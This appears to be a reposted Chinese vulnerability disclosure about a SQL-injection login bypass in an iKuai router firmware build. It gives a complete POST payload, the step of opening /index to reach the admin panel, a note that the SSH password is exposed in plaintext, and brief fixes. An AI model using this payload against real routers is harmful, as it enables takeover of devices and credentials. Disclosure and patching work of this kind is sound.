爱快软路由最新版IOS使用sql盲注绕过登录

华盟君华盟君 安全资讯,最新资讯,黑客技术 10 年前
17W 0
华盟原创文章投稿奖励计划

  版本号iKuai8_2.4.4_Build20150604

  漏洞地址:192.168.163.100/login/x

  POST表单:pass=&user=-1%22%20OR%203*2*1=6%20AND%20000380=000380%20--

  发送POST表单之后访问/index即可进入后台

  可直接修改管理员密码 SSH密码 SSH密码在后台明文存储 存在被控制的风险即傀儡机

  SSH密码使用审查元素即可看到=。= 开发同学这样不行的说

  漏洞证明:

 
 
爱快软路由最新版IOS使用sql盲注绕过登录
爱快软路由最新版IOS使用sql盲注绕过登录
爱快软路由最新版IOS使用sql盲注绕过登录
   

  修复方案:

  过滤OR

  网页不要显示SSH明文密码

原文地址:https://hack.77169.com/201508/207591.shtm

本文原创,作者:华盟君,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/21573.html
华盟君官方
华盟君

5.57K篇文章 177.78M总阅读量

相关文章

发表回复